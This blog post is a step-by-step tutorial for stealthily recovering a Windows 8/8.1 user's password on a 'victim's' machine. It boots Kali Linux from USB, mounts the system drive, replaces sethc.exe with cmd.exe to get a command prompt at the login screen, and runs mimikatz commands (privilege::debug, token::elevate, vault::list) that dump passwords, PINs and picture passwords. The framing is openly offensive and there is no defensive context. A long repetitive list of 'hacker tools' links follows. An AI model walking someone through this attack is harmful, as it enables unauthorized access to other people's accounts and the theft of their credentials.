Sunday, January 28, 2024

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...

Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)

Steps:

1. First of all download mimikatz and put it in a pendrive.

 2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

 3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

 mkdir /media/win
ntfs-3g /dev/sda1 /media/win

 [NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

 4. Now navigate to the System32 folder using the following command

 cd /media/win/Windows/System32

 5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

 mv sethc.exe sethc.exe.bak

 sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

 6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

 cp cmd.exe sethc.exe

 [Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

 7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

 8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this



9. Now navigate to your usb drive in my case its drive G:


10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)
11. Run mimikatz and type the following commands one after the other in sequence:

 privilege::debug
token::elevate
vault::list

 the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)







That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

 Hope you enjoyed the tutorial have fun :)
More articles
  1. Best Pentesting Tools 2018
  2. Underground Hacker Sites
  3. Hacking Tools Name
  4. Hacker Tools 2020
  5. Hack Tools For Games
  6. Pentest Tools Review
  7. Pentest Tools Framework
  8. What Are Hacking Tools
  9. Kik Hack Tools
  10. How To Hack
  11. Pentest Box Tools Download
  12. Hacker
  13. Nsa Hacker Tools
  14. World No 1 Hacker Software
  15. Hack Tool Apk
  16. Hacker Tools Software
  17. How To Install Pentest Tools In Ubuntu
  18. Hacker Techniques Tools And Incident Handling
  19. Beginner Hacker Tools
  20. Pentest Tools Find Subdomains
  21. Usb Pentest Tools
  22. Hacking Tools Windows
  23. What Are Hacking Tools
  24. Pentest Tools Alternative
  25. Hacker Tools Linux
  26. Hacker
  27. Hacker Tools Online
  28. Pentest Tools For Ubuntu
  29. Hacker Tools Mac
  30. Tools For Hacker
  31. Hacker Tools Hardware
  32. Hack Tools Download
  33. Black Hat Hacker Tools
  34. Hacker Tools Online
  35. Hack Tools For Games
  36. Hacker Tools Apk Download
  37. Pentest Tools For Ubuntu
  38. How To Install Pentest Tools In Ubuntu
  39. Hack Website Online Tool
  40. Hackers Toolbox
  41. Tools For Hacker
  42. Hack Tools
  43. Hacking Tools Usb
  44. Hacker Hardware Tools
  45. Best Hacking Tools 2020
  46. New Hack Tools
  47. Hacking Tools For Beginners
  48. Pentest Tools Bluekeep
  49. Hacker Tools Online
  50. Hacker Tools List
  51. Pentest Tools Review
  52. Hacker Tools Hardware
  53. Nsa Hack Tools
  54. Hack Tools 2019
  55. Hack Tools Download
  56. Pentest Tools Port Scanner
  57. Hacker Tools Mac
  58. Pentest Tools Review
  59. Hacking Tools For Kali Linux
  60. Tools Used For Hacking
  61. Nsa Hack Tools Download
  62. Hacking Tools Name
  63. Hacker Search Tools
  64. Hacking Tools For Kali Linux
  65. Underground Hacker Sites
  66. Pentest Tools Free
  67. Kik Hack Tools
  68. Hacker Search Tools
  69. Hacker Tools Github
  70. Hacking Tools Free Download
  71. Best Pentesting Tools 2018
  72. What Is Hacking Tools
  73. Hacking Tools Software
  74. Hack Tools For Windows
  75. Pentest Tools Windows
  76. Hacking Tools Name
  77. Hacking Tools Kit
  78. Pentest Tools For Ubuntu
  79. Hacker Tools For Ios
  80. Hacking App
  81. Hack Website Online Tool
  82. Hacker Tools 2020
  83. Hack Apps
  84. World No 1 Hacker Software
  85. Hacking Tools And Software
  86. Tools Used For Hacking
  87. Hacking Tools 2020
  88. Pentest Tools Website
  89. Ethical Hacker Tools
  90. Nsa Hack Tools Download
  91. Pentest Tools Find Subdomains
  92. Hacking App
  93. Pentest Box Tools Download
  94. Pentest Reporting Tools
  95. Pentest Tools For Android
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)